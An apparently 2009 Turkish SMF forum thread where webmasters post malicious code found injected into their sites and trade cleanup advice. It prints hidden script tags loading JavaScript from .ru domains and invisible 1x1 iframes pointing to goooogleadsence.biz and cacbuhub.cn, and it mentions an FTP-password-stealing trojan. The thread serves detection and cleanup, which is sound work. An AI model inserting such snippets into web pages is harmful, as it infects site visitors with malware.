Web sitenize girerken "bu site saldırgan olarak belirlenmiş" diye bir uyarı mı alıyorsunuz?
Burada, dosyalarınıza bulaşabilecek zararlı kodları bulabilir ve bunları sitenizdeki tüm dosyaların kodlarında arayıp silerek çözüme kavuşabilirsiniz. Zararlı kodların temizlenmesinden sonra "bu site saldırgan olarak belirlenmiş" uyarısının gitmesi biraz zaman alabilir.
Zararlı Kod #1
<script src=http://www.netcfg9.ru/script.js></script><script src=http://www.chk06.ru/script.js></script><script src=http://www.chk06.ru/script.js></script><script src=http://www.chk06.ru/script.js></script>
Zararlı Kod #2
<iframe src="http://goooogleadsence.biz/?click=1C95CF" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Not: Eğer bu tür zararlı kodları biliyorsanız lütfen gösterdiğim gibi mesajınıza ekleyiniz.
Önemli not: Zararlı kodları temizleme hakkında destek vermiyoruz, bu konu sadece bilgilendirme amaçlı açılmıştır.
ya bu ruslar iyice canımı sıkmaya başladı !
botlar artık görsel dogrulamayıda geçiyor sanırım 1.1.8 sitemin birindee sürekli üye siliyordum :s
adult sitelerin reklamını veya linklerini yayınlamak için konu bile açıyorlar :))
bu adresleri tespit edip cpanel den ip adreslerini banlayarak kurtuldum.
Önemli bir konu saol :)
Saol husmen..
Çok iyi bir bilgilendirme olmuş bazı arkadaşlarımda bu problem vardı kod temizliği yaparak halletmiştik.
EFET OLUYOR PANEL GİRDİĞİMDE REKLAM ÇIKIYOR...
bu kod bilgisayarınızada bulaşıyor bilginize.Bilgisayarınıza format atın daha sonra ftp'den index.php'lerin hepsini indirip en altına bulunan bu kodları silip tekrar upload ediniz.
İşte şu index olayında yanılıyorsunuz arkadaşlar sadece indexde var zannediyordum..2 gün evvel ama sadece indexde değil lood.php,ssi,ssi.example falan herşeye bulaşmış temizlemek bir hayli zaman aldı iframe bir koddu...burada arkadaşların dediklerini yaptım hepsini sildim bilgisayarımı tarattım öncesinde sonra format attım yine virüs taraması yaptım ve dosyaları atar atmaz şifremi değiştirdim..
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
</body> den önce buda ekleniyor bunuda ekleyebilir misiniz?
Bu dosyanin virüs oldugunu zannetmiyorum...
@«['BrKDmRcN']» verdiğin kod Google Analytics'e ait ve virüs değil.
O kodu ekleyince avast siteye girdirmiyor ama şimdi onu silince şuan o uyarı çıkmıyor.
Quote from: «['BrKDmRcN']» on April 07, 2009, 06:16:14 AM
O kodu ekleyince avast siteye girdirmiyor ama şimdi onu silince şuan o uyarı çıkmıyor.
analytics.com google 'ın webmasterlara ücretsiz sunduğu normalde aylık 300/400 $ değerindeki bir sistemdir.
Sitenizin detaylı hit v.b. bilgilerini tutar bunun içinde bütün sayfalarda çalışacak bir kod eklenmesi gerekir ve yine bu kodu google değil webmaster kendisi koyar sitesine ve genelde smfde index.templateye ekleriz biz bu kodu. Yani konu kendiliğinden eklenen kodlarla ilgili verdiğin kodu google asla kendi eklemez ;)
goooogleadsence.biz
bu linke bende rastladım beta 4 kulanıyordum siteyi komple silip rc1 kurdum :)
Selamlar Sn. Tsey - husmen73 (Gulhin) ,
Bazı bilgisayarlardan siteme giriş yapıldığında virüs uyarısı alınıyormuş. Bu kodların sitemize bulaşıp bulaşmadığını nasıl anlayabiliriz?
Saygılar
bu Kodlar ben Baya Bi yormustu :) Sitem Direk Googledeki Linkimden Dağıtıyordu Trojeni ve 360 tane Trojen sallıyordu bilgisayara :) Ama işin tuhafı sadece googledki linkimden dağıtıyordu trojeni normal expolerden bişey yoktu forumun yedeğini alıp sildim ve tekrar kurdum bişey kalmadı ama bu trojen sitemi bi anda googledki yerimden 15 sayfa geri attı baya deli bir trojenmiş :D simdi bişey yok ama Şüphelendiğim tek sey ntv haberden cekmem oldunu sanıyorum cunku ntv haber sitesi siteadvisordede kara listede viruslü olarak gorunuyor kullanan arkadaşlar varsa değiştirsinler ;D
Quote from: hukuk on April 13, 2009, 04:13:05 PM
Selamlar Sn. Tsey - husmen73 (Gulhin) ,
Bazı bilgisayarlardan siteme giriş yapıldığında virüs uyarısı alınıyormuş. Bu kodların sitemize bulaşıp bulaşmadığını nasıl anlayabiliriz?
Saygılar
Sitenize girişlerde virüs uyarısı alıyosanız zaten bulaşmış demektir. Ben avast home kullanıyorum, bana bayağı yardımı dokunuyor. Bu program ile sitenizin tüm dosyalarını taratabilirsiniz (öncelikle FTP'deki tüm dosyaları bilgisayarınıza indirip, taramayı yapın) Ayrıca http://safety.live.com (Online Tarama) adresinden de kendi bilgisayarınızı zararlı içeriklerden temizleyebilirsiniz.
Ben geçen forum u komple indirip, öyle tarama yaptım esed nod32 ile. En doğru olanı da bu galiba, sonra yine aynı yere atıyorsunuz forum u. :)
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...
Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...
Burda ; genel, SYSTEM.INI, WIN.INI, BOOT.INI Gibi bölümler var. Hangisinde ne yapmamız gerekiyor anlayamadım ben bunu.. :)
Quote from: turklerinneti.com on April 21, 2009, 08:46:16 PM
Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş. Bilgisayarında Başlat > Çalıştır > Msconfig yaz başlangıça gel eğer ntos.exe yazıyorsa tamamdır o bilgisayardan her ftp ye girdiğinizde şifrenizi alır ve her index.php veya index.html veya default isimli dosyaları indexler o yüzden hosting firmaları da anlayamaz benim başıma geldi sorunu anca kendim çözdüm. Hosting firmanızın yapacağı bir iş kalmıyor zaten direk forumun yedeğini alıp silin daha sonra tekrar kurun fakat başka bir pc den yani ntos.exe bulunmayan bi pc den saygılarımla...
Burda ; genel, SYSTEM.INI, WIN.INI, BOOT.INI Gibi bölümler var. Hangisinde ne yapmamız gerekiyor anlayamadım ben bunu.. :)
Zararlı yazılımlarla ilgili doctus.org sitesi var. Oradan destek alabilirsiniz.
Quote from: The-Hatip on April 19, 2009, 03:00:04 PM
Kardeşim avast filan boş.
Avast'ın boş olduğunu nasıl söyleyebiliyorsunuz anlamıyorum. Kullanılan yazılımlar kaçak ve güncellemesi olmazsa zaten bir işe yaramaz.
The Hatip arkadaşımızın verdiği komut ; Geri yükleme komutu şimdi dikkatimi çekti de. ;) Bunu zaten biliyordum ben.
Zararlı yazılımlar konusundaki verdiğiniz bilgi için teşekkürler. Burdan yardım alıcam.. ;)
ewet arkadaşlar geçenlerde ftpdeki dosyaları kontrol ettiğimde bi tane bende buldum ve siznle paylaşmak istedim mümkünse bunuda eklermisiniz
<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>
Merhaba,
ben hic bir mod veya herhangi bir degisiklik yapmadan sayfanin altinda ie'de hata mesaji aliyorum.
ve dosyalari kontrol ederken asagi yukari butun sayfalarda bu kod vardi. En ust tarafta. ilginc genelde 4 5 satirlik scriptler oluyor bu artik ne ise yariyorsa :-\ antivirusum genelde zararli trojan scriptler oldugunda ötüyö :P bunda ses yok.
bu kodlari silmeye calisiyorum her actigim dosyada var :( silip 444 chmod ayarlari 444 yapiyorum.
ie hatasi bu kod ile ilgisi olmasa gerek siliyorum siliyorum hala mesaj duruyor :) "membre introuvable" hatasi. silmeye devam ediyorum.
altaki kod hakkinda bilgilenderebilirseniz.
kolay gelsin.
// Yağız: Sayfayı aşırı uzattığından kodları kaldırmak zorunda kaldım.
aynı bu kod aylarca eklendi ben sildim o geldi o geldi ben sildim :=)
hatırladıgım kadar sizde yazmıştınız bu soruna .
çözümü şunda buldum ilk olarak ftp yi boşalttım antivir ile arattım sonra indexleri aradım tek tek temızledim.
ftp şifremi değiştim file zilla da kayıtlı idi sitem oradan da sildim daha sonra ne gelen ne giden oldu
http://www.simplemachines.org/community/index.php?topic=240751.msg1552494#msg1552494
http://www.simplemachines.org/community/index.php?topic=244570.msg1579562#msg1579562
http://www.simplemachines.org/community/index.php?topic=274959.msg1802205#msg1802205
Merhaba,
Ben format attim, dosyalari temizledim tek tek php js txt css ne varsa, ftp sifrelerini degistirdim, host sirketi bizde sorun yok sizde var gibi dedi bana :D, 2.3 tane son model antivirus ile taradim, trojan malware programlara tarama yaptim vs.. ufak seyler buldu sildi tekrar islemleri yaptim yine olmadi :) o kadar saatimi verdim yok benim bilgisayarimi cok sevmis olsa gerekki napsam kurtulamiyorum.
Araya araya arkadasim hakkinda bilgi edindim..
son dönemlerin yildizi parlayan scripti.. bizede bulasmis. :)
Artik hayirlisi olur insAllah diyorum ve bir süre dinlenmeye cekiliyorum :-\
> Gumblar Injekted Script Hakkinda < (http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/)
Allah c.c hepinizi bu script'en uzak tutsun.. Amin.
Bu sayfanın yapısı bozuk görünüyor bende arkadaşlar. Son mesajlardan sonra sanırım çok genişlemiş sayfa yanlara doğru. İlk sayfada sorun yok ama bu 2. sayfa bozuk gösteriyor. Sadece bilgi amaçlı söyleyeyim dedim herkeste de böylemi bilmiyorum..
Quote from: Pяєηѕєѕ 丂√丂 on May 18, 2009, 03:06:25 PM
Merhaba,
Ben format attim, dosyalari temizledim tek tek php js txt css ne varsa, ftp sifrelerini degistirdim, host sirketi bizde sorun yok sizde var gibi dedi bana :D, 2.3 tane son model antivirus ile taradim, trojan malware programlara tarama yaptim vs.. ufak seyler buldu sildi tekrar islemleri yaptim yine olmadi :) o kadar saatimi verdim yok benim bilgisayarimi cok sevmis olsa gerekki napsam kurtulamiyorum.
Araya araya arkadasim hakkinda bilgi edindim..
son dönemlerin yildizi parlayan scripti.. bizede bulasmis. :)
Artik hayirlisi olur insAllah diyorum ve bir süre dinlenmeye cekiliyorum :-\
> Gumblar Injekted Script Hakkinda < (http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/)
Allah c.c hepinizi bu script'en uzak tutsun.. Amin.
Amin :) şimdide iframe virüsü çıktı yeni olarak bu daha da kötü :)
bu iframe vürüsü her kese vürüs salıyor yavs bundan kökten nasıl kurtuluruz siliyorum geri geliyor
S.a
Arkadaşlar siteye ilk girdiğimde giriş yapın diye çıkan safyfa açılıyor.Ancak giriş yaptığım anda virüs programı uyarı verip bağlantıyı kesiyor.İndex.php ve index.htm dosyalarında üç ayrı iframe bulup sildim daha önce sitenin yüzünü dahi göremeden kapanıyordu.Ancak şimdi giriş yaptıktan sonra veya her hangi bir kategoriye girdikten sonra virüs programı kapatıyor.Yardımcı olursanız çok sevinirim arkadaşlar...
Quote from: abraham_ on July 10, 2009, 02:59:06 AM
S.a
Arkadaşlar siteye ilk girdiğimde giriş yapın diye çıkan safyfa açılıyor.Ancak giriş yaptığım anda virüs programı uyarı verip bağlantıyı kesiyor.İndex.php ve index.htm dosyalarında üç ayrı iframe bulup sildim daha önce sitenin yüzünü dahi göremeden kapanıyordu.Ancak şimdi giriş yaptıktan sonra veya her hangi bir kategoriye girdikten sonra virüs programı kapatıyor.Yardımcı olursanız çok sevinirim arkadaşlar...
Tüm dosyalarınızı virüse karşı kontrol etmelisiniz. Bende Avast Home var, bununla FTP'den tüm dosyaları indirip tarattığımda bana hangi dosyalarda virüs varsa gösteriyor. Bu yöntemi kullanabilirsiniz. (Avast güvenlik seviyesi en yüksekte)
Tüm dosyaları indirip avast 4.8 professionel ile tarattım birşey bulamadı.Olmadı karspersky 7.0 ile tarattım yine bir şey bulamadım.Ben bütün index.php dosyalarına kendim elimden geldiğice bakmaya çalıştım.Daha önce sitenin yüzünü dahi göremiyordum bütün index.php dosyalarında iframe vardı sildim onları site açıldı yani artık açılırken virüs uyarısı yapmıyor.Ayrıca temizlediğim tüm dosyaların izinlerinide 555 yaptım.Şimdi ise giriş yapınca veya her hangi bir kategoriye tıklayınca uyarı yapıyor avast ve uyarıda index.htm dosyasını gösteriyor ama benim ftpdeki dosyalarda index.php dışında index dosyası göremedim... :(
Sorun çözüldü arkadaşlar şu linkteki http://www.simplemachines.org/community/index.php?topic=323533.0 program ile dosyaları taratınca iframin bulunduğu tüm dosyaları bulabildim.Herkese kolay gelsin...
Ellerine sağlık kardeş
Ben merak ettiğim için bişey sormak istiyorum; Bu virüs kodlarını bi not defterinin içine yapıştırıp, masaüstüne alsak ve ben açsam, bizim bilgisayara da bulaşırmı bu ? :)
Quote from: turklerinneti.com on July 23, 2009, 04:42:04 AM
Ben merak ettiğim için bişey sormak istiyorum; Bu virüs kodlarını bi not defterinin içine yapıştırıp, masaüstüne alsak ve ben açsam, bizim bilgisayara da bulaşırmı bu ? :)
Kodların kendisi mi virüs yoksa internet üzerinden otomatik mi indiriliyor buna bağlı. Sayfa açıldığında internetten indiriliyorsa ve internetin yoksa haliyle birşey olmayacaktır.
<iframe frameborder=off src=http://cacbuhub.cn/pa.html width=1 height=1 ></iframe>
Bunun gibi yada daha büyük virüs kodlarını, Not pad'e yapıştırıp, masaüstüne atsam ve daha sonra bunu sadece dosya olarak açsam demiştim bulaşırmı bizim bilgisayara da acaba ? ;)
Bununla ilgili kesin çözümü buldum ve sizinle de paylaşmak istedim arkadaşlar. Bu yöntemi daha önceden de kullanmıştım ama dün akşam ne kadar faydalı olduğunun farkına vardım.
http://onecare.live.com/site/tr-tr/default.htm burda koruma ve temizleme diye iki seçenek var. Bunların ikisini de ayrı ayrı yapın. Virüs bulaşmış tüm dosyalarınızı sildiğini göreceksiniz. Bunu yapmadan önce, çok önemli dosyalarınız varsa onların yedeğini alın ama (Temiz olduğunu düşündüklerinizin) Çünkü bulduğu tüm zararlı dosyaları siliyor.. Kolay gelsin. ;)
çok teşekkürler ilaç gibi geldi.